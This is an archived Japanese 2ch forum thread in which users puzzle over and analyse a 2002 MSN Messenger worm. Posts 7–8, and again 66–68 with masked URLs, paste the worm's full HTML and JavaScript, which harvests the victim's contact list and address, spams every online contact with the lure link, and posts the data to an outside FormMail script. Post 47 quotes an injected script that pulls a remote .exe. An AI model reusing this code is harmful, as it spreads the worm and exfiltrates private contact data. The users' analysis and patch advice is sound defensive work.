1read 100read
2013年06月セキュリティ306: MSN(Windows)メッセンヂャーで (126) TOP カテ一覧 スレ一覧 2ch元 削除依頼
本家Bugtraq系MLをマターリ和訳するスレ(雑談可) (101)
フレッツ・セイフティ(FLET'S SAFETY)ってどうよ (191)
フレッツ・セイフティ(FLET'S SAFETY)ってどうよ (191)
ノーガード戦法こそ最強 (140)
Macは感染しなくても保菌はしてる。 (111)
ポートを塞ぐ (136)

MSN(Windows)メッセンヂャーで


1 :02/02/14 〜 最終レス :2013/02/14
URGENT - Go to http://users.skynet.be/dark.angel/cool.htm
登録してあるいろんな人から↑のようなメッセージが届きまくってるんですが・・・これナニ?

2 :
そのアドレスクリックしたら、リストにあるメンバーに同じ物を
送ってしまう模様

3 :
>>2
ああ、そうなんだ。要はクリックしなきゃいいんだね?

4 :
怖いのでさげ…

5 :
クリックしちまった・・・

6 :
とりあえずクリックは禁止です。
中身見てみたんだけどIPは抜かれてるみたい。
固定IPじゃないなら繋ぎ直してIP変更しておくほうがいいです。
識者の方いたら解析きぼんぬ。

7 :
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var msgStr = "URGENT - Go to http://users.skynet.be/dark.angel/cool.htm";
//var msgStr = "URGENT - Go to <a href="http://users.skynet.be/dark.angel/cool.htm">www.ratec.ar.cx</a> NOW";
function Go(){
msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

8 :
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script>
</head>
<body onload="Go()">
<p align="center"> 
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.ratec.ar.cx" ID="Hidden1">
<input type="hidden" name="recipient" value="unmeteredinternet@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>

9 :
ソースね
これは悪質だ

10 :
afe

11 :
これ、結局なんなの?

12 :
みたところ

1. あなたのリストでオンラインの人全員に URGENT - Go to http://users.skynet.be/dark.angel/cool.htm というメッセージを送る
2. 日付,あなたとあなたのリストに登録されてる人全員の名前とメールアドレス,あなたの IP アドレスと Web ブラウザの種類を unmeteredinternet@hotmail.com に送る

ようです.


13 :
unmeteredinternet@hotmail.com
送ってる?

unmetered(計測、測定されていない)はダミーか・・・

14 :
10人位から一気に来て、30人位に送っちまったよ(死

15 :
どうしよ?
1、破壊活動はありますか?
2、ワクチン等はどこで?
博識のかた、よろしくお願いします。、、、、、チンパイ(´Д`;)ヾ

16 :
>15
気にするな,タダの祭りだよ!

17 :
てきとーなメール送ろうとしたら
エラー : アドレス 'unmeteredinternet@hotmail.com" が存在しません。このメッセージは送信されませんでした。
ってなって送れなかった。

18 :
>>15
>>12 の推測が当たっているなら
1. 特に見あたりません
2. 特に必要ありません
>>16
ETC の forum は祭り状態になってますね

19 :
つまりココを書換えて(以下略

20 :
>>15
2. に関して,どうやら IE のパッチが公開されているようです.
http://pc.2ch.net/test/read.cgi/pcnews/1013485960/

21 :
パッチ入れてて踏んじゃったんだよなぁ(´ー`)
今のところ何も言われてないから被害はなしかな?


22 :
もう友達から送られちゃったし、クリックしちゃったし
、自分も送ったらしいからやヴぁい( ゜Д゜)ゴルァ!

23 :
ウィルス直リンしてあほか…。

24 :
((((((。 ゚Д゚)ノ ヌオォォォ!!怒るでしかし!!

25 :
ふんじゃったよー
でも、URL存在しないと出たよ、IE6だから?

26 :
http://help.msn.co.jp/maintenance.htm#MESBUD
これをみろ。

終了---------------------------------------------------------------------------------------------

27 :
漏れURLクリックしたんだけど、
URLクリックした人、大丈夫かYO!!
ガクガクブルブル((((((。;゚Д゚)何かなってたらどうしよう・・。

28 :
>>27
俺再起動したけどどうもない

29 :
踏んじゃったけど、発信してないみたいだなぁ
ノートンPFWとルーターの所為かな?

30 :
http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl
↑こいつが500になってるから

31 :
ここ見るとオイラのノートンが
反応するのですが?
気のせい?

32 :
また新しいの来た。
A trop excelent va voir !! http://insurektiontest.free.fr

33 :
オンラインのひと全部の窓が開いたぞ

34 :
同じ仕組みのやつなのかな。

35 :
>>34
iriaで落としたけど大体同じだったよ。

ところでブラウザからソース見る時ってどうやるんだっけ?
〜〜〜view:http://www.〜〜〜〜って感じのやつ。

36 :
>>35 みたいURLのhttpの前に[view-source:]の[]内を入れればOK。

37 :
>>35
view-source:http://
だす。

38 :
>>36 >>37
ああ、〜view:じゃなくて
view-source:だったか〜。アリガトォ!!

39 :
糞!踏んだー

40 :
さっきノートン先生の定義ファイルを更新したとこだったよ。
あぶねー。

41 :
>>32
今、それきたよ〜。
>>36-37でソースみたら、ノートン先生が反応したよ。
さっきウィルス定義自動更新されたのはこのせいだったのか。。。

42 :
くそ流行だしてるYO

43 :
漏れも踏んだけど、VB2002が反応した

44 :
そもそも、MSNメッセンジャ削除したらいいんでないの?

45 :
>>44それは強引だろ。


漏れもノートンアプデトしてたから無事だが、これはトロイ?

46 :
ばすきゃんハンノウシネ〜ヽ(`Д´)ノ

47 :
<script>
azao=window.open
('http://kit.carpediem.fr/13244/CD/CineVoyeur.exe',
'azao','toolbar=0,location=1,status=0,
menubar=0,scrollbars=1,width=5,height=5');
</script>
<script>
window.open('http://genesis.ift.cx');
</script>
↑これが追加されてるな
exeファイル落としそうになった
俺も踏んじまったがIE6だったんで確認が出た(?)

48 :
>>45
ワームみたいだね。
シマンテックのページ
http://www.symantec.com/region/jp/sarcj/data/j/js.menger.worm.html

49 :
C:\WINDOWS\Temporary Internet Filesからも感染するから、削除しなはれ。

50 :
トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_MENGER.GEN

51 :
C:\Documents and Settings\●\Local Settings\Temporary Internet Files\Content.IE5\WX0HIJ01\l50[3]
は JS.Menger.Worm ウィルスに感染しています。
このファイルを修復できません。
ファイルが見あたらないんだが。
Content.IE5フォルダのフォルダ全部削除してやりました。

52 :
ieのプロバティから、全般のタブその中からファイルの削除でできなかった?>51

53 :
>>52
わからん。出来るとは思うけど。
Content.IE5はアクセス拒否とか出てスキャンしてくれないし

54 :
修正プログラム。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/download.asp

55 :
>>53
う〜ん。。HTMLファィルだよね?
アクセス拒否くらうもんなのかなぁ。


56 :
>>55
HTMLなのかすら不明。
WX0HIJ01フォルダには何一つファイルは入ってなかったし。

57 :
JS.Exception.Exploitもウィルス検索では引っかからなかったし。
イベントビューア見て初めて発見したよ。
今回も同じで検索では引っかからずイベントビューアで発見。

58 :
>>56
んとね、俺が感染した奴はhtmlファイルからだったの。
だから感染元はHTMLファイルで間違いないと思うのね。
で、隠しファイルを表示するとかにして確かめてみた?
それで見えないとなるとちとやっかいだね。。

59 :
>>58
もちろん。
隠しファイルも表示してセーフモードで調べたもん。

60 :
>>1
セーフモード起動で、
C:\Windows\Sysem\mshtml.dll を
mshtml.vir にして、Win 再起動したらドーヨ?

61 :
IEのパッチとメッセンジャーバージョンアップしないと駄目だな

62 :
javascriptきれよ

63 :
>>31
このスレッドの上の方でウイルスのソースが貼ってあるせいだろ。

64 :
「JS.Menqer.Worm」が検出された藁

65 :
IEパッチとメッセンジャー最新版でも防げない(藁
人柱になってやった俺に感謝せよ

66 :
<head> <title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "URGENT - Go to http://####1";
//var msgStr = "URGENT - Go to <a href="http://####1">www.ratec.ar.cx</a> NOW";
function Go(){
msnWin = document.open("res://####2", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1">
</object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();

67 :
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ",
email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ",
email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type:
text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

68 :
</Script>
</head>
<body onload="Go()">
<p align="center"> 
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://####3"; NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://####4"; ID="Hidden1">
<input type="hidden" name="recipient" value="unmeteredinternet@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>

69 :
http//users.skynet.be/dark.angel/cool.htm

これをクリックしてジャンプすると、自分の登録しているユーザに同様の
メッセージが送られ、蔓延します。

但し周りの状況から推察するに、これが起きるのはどうも Windows の
デフォルトブラウザが IE の場合のようです。当方 Opera6 をデフォルト
ブラウザにしているのですが、これは起きませんでした。

これについての情報を少し漁ってみたのですが、WWW 上では見当たりません
でした。それでこのソースを取得してみました。見たところクライアント
サイド実行型のスクリプトのようですが、当方ではちょっと分からないので
よろしければご教授頂けると幸いです。

本来ならば先頭と最後に <html></html>タグが入りますがここでは念のため
割愛しておきます。

また、URL が直接的にあらわれる部分は以下のように変更しています。

####1 = 'users.skynet.be/dark.angel/cool.htm'
####2 = 'mshtml.dll/blank.htm'
####3 = 'www.rjdesigns.co.uk/cgi-bin/FormMail.pl'
####4 = 'www.ratec.ar.cx'

http://memo.st.ryukoku.ac.jp/archive/200202.month/2955.html
にある。

70 :
上のリンク踏んだら、
「Js.Menger.Worm が検出されました」ってノートン先生がおっしゃったよー!
とりあえずハケーンされたファイルは削除したけど…。何で開いていきなり感染??
あと、他の板でも見かけたけど、
MSNメッセンジャーの新しいバージョンが出た(Messenger v4.6)っていうからインストールしようとしたら、
「内容と署名が一致しません」…これって普通だったっけ??

71 :
XP標準のMSNはいいよ。広告がなくってさ。

72 :
MSNのプロフィールの更新日って内容がどこも変ってないのに
更新日付だけが更新されているんですけど
なぜ??


73 :
>>72
スレ違い

74 :


75 :
>>74 sine

76 :
(^^)

77 :
(^^)

78 :
踏んじゃったyo(´Д`;)レス確認しようよ私。
チンパイで再セットアップしますた。←やり過ぎ
結局IPはぬかれてるの?ルーターで固定IPだったら心配ないのかな?

79 :
(^^)

80 :
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

81 :
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

82 :
     /∵  ▼ \
    /∴       ヽ      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   , |∴   /  \ |、   / 
  |`──-( / )-( \)l |  <   ちゃんと見てくれたか?
  | [     ,   っ  l |    \ 
  `-,     'ヽ、_ソ  }'     \____________
   ノ ヽ、    `'   ノ、     
 /     ゝ ── '   ヽ
/   ,ィ -っ、        ヽ
|  / 、__ う 人  ・ ,.y  i
|    /        ̄ |  |
ヽ、__ノ          ノ  ノ
  |      x    9  /
   |   ヽ、_  _,ノ 彡イ
   |     (U)    | 
http://cgi.2chan.net/n/src/1056821090165.jpg

83 :
            , -;;'".:.:.:.:./`=-;,_ / _=' _
          , '";;;;;.:.:.:.:.:.:.r'/;/;彡;Xik''"ミ`ミ;、
          ,':..:.:.''''':.:.:.:.:.:.:.!;;;:::::_//lj_,.>ミミミヾ,'    ロマンティックageるよ
         ;;.:.:.:.:.:.:.:.:.:.:.:.:.:.!   `;:/,_l  l!lll;:`;
         !l!ill!!l.;.;!;!;!!l.:l:l:.l , - 、 :/:l  j!ll l
         l;!!;l;l;i"l`メl.!;;l;l;:i _,  l,、;!   j!     ロマンティックageるよ
         .!l!ll!l !,!l=、!i !.! l!'i,:`i ,.lkj
         l(yk. ミ(iヘ!、   !j !l'..レ'l
         l!ヽヘ ,.`-'` ,j    .,!l;l          ホントの勇気 見せてくれたら
         /!l.!;`'ヘ/`> -、_;:z'  ノ;!;!'!
       _.ノ l!l!;l;!;l;i:ゝ=...,,___../;i;l;!!j
          !l;l;! !l;l;i:l: l   l;|l;l;!;!;!'          ロマンティックageるよ
          ,.._ヽl;l;l;l;l;.メ   jl二`il~`ヽ.
       _,.-''`y,// /L,.___v ___!l |!l l_,,./ヽ
     ,-'"    l!l l!`-リi,-=''+;:i',! .|!!. ヾ.._/      ロマンティックageるよ
  ,.ゝ=;"    _,,. l  ゙`=''`!__,,,.jl"  》   l
./  ヽ`y,,.. -'" `/         .l!'l!    !

84 :
`,  `、`、     i          丿/ (二!      トキメク胸に キラキラ光った
 `メ,   >    `--=    =-‐,' `==== ゝ
   `k,/'" `、    | /  ,.',.'/ ,/  !  r
    `.、;/ゝ、  i~~~コ~!ト二l!コ!}'i  k  l      夢をageるよ
     ゝ'"  `;'"    -|! ヽヾ《   l  ,,:j
      k_,_,i='"   ‐-=|!   ヽヾ、_  レ'" !    __   ,;。
       / /      |!    ` y `i`l_,. "l    iniy'='y''
      ,/_/,,,.....,,,,,_ミ .j!=''"   /j ..l l='"~`i  _=' ...:::::lr
      r~      `;ミ__,,.   /" .l_j k_,,='j'='"ニ::::::::::j
      !        ||       l  {,-,v'"!L{,:::;;:::.-'"
      !        !'|i\    ,-'l-'/./_,=i"! `-'"
      l        ! '|| \ ,-'" ,,l y_/ l!l'
      l        ! |.!_,,-'" ,-'".l l .l`='"

85 :
MSNでしらないところから広告?見たいなメッセくるのはなんですか?

86 :
あげ荒らし帰れよ

87 :

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

88 :
(??Д??)??????
?????(??Д??)??????

89 :
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

90 :
RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove

91 :
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

92 :
質問ですが
以下のサインイン名に対して、正しくないパスワードを入力した回数が多すぎます :
とでてきたのですが不正アクセスでも食らったのでしょうか・・・
時間たってもなおらないのですが・・・

93 :
このすれ、ずっとレス付いてないのに、のこってるよ・・・

94 :
MSNメッセで、デジカメ画像のファイル送信をしたところ、相手側のPCの調子がおかしくなりました。
ネットに接続できないとか。
もちろん画像にウィルスが付いているはずもなく(チェック済み)。
何が原因でしょう?こんなことってあるんですか??


95 :
英語のスパムメールをブロックするソフトや方法なないのかね。spy−botやad−aware
以外に。

96 :
msn messengerのビデオチャット録画する方法おしえてください。
変死ん 激しく希望

97 :
まだまだ無料で使える部屋があります。
とりあえず http://chat.msn.com/chatroom.msnw?rm=JudyGreenroom&pgmarket=en-ca
へどうぞ
詳しい説明をします。

98 :
http://www.douga-ch.net/files.php?no=20951&junle=shirouto&filename=20951.wmv


99 :
R















意味もなく

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
JPEGウイルス登場、各社が警告 (118)
ルーターとファイヤウォールどっちがイイ? Part2 (130)
【資格】CISSP (146)
【自分で】Win98・Meのセキュリティ3【守る】 (198)
avast!Anti-Virus Part167 (200)
より安心してインターネットを楽しむために (126)
--log9.info------------------
キャスト 2 (279)
ザ!鉄腕!DASH!! 61 (407)
世界1のSHOW TIME〜ギャラを決めるのはアナタ! 2 (246)
【本スレ】☆ ちちんぷいぷい -MBS- ★ 【Part.81】 (171)
シルシルミシルさんデー Part10 (151)
たかじん NO マネー 15 (1001)
ローカル路線バス乗り継ぎの旅6【ルイルイ&蛭子】 (371)
痛快!ビッグダディ Part76 (1001)
若大将のゆうゆう散歩 Part3 (237)
ブラックマヨネーズのハテナの缶詰 (975)
ぐるぐるナインティナイン Part.67 (208)
ゲーム&クイズバラエティ 「ペケポン」 Part9 (348)
【NMB】NMBとまなぶくん☆1【かまいたち】 (251)
【TBS】Nスタ part4よ♪【JNN】 (967)
☆・・・ぶらり途中下車の旅 10駅目・・・☆ (216)
いきなり!黄金伝説。part28 (258)
--log55.com------------------
【冷食】エビフライ市場縮小 16年4%減204億円 “衣フライ”に飽きも
【社会】秋葉原事件10年、加藤死刑囚の父は今 明かりともさず生活★2
【目黒女児虐待死】「パパ、ママいらん」でも「帰りたい」 亡くなった5歳児が、児相で語っていたこと 県や都はどのように対応したか★5
【米国】「金正恩が米朝首脳会談再開を土下座して懇願した」 ジュリアーニ氏、その後釈明 「例えにすぎず、私の解釈だ」
【秋葉原無差別殺傷から10年】献花台にマスコミが座り込み占拠で非難の声、追悼に訪れた人を無遠慮に撮影も
【春のBAN祭り】「テキサス親父」ことトニー・マラーノさんのYouTbeチャンネルが永久BAN★4
【加藤の乱】凄惨な光景 今も忘れられない/秋葉原事件10年 負傷者救護の青森県人
【大阪】<ホテル>大阪市で開発ラッシュ 訪日客増加追い風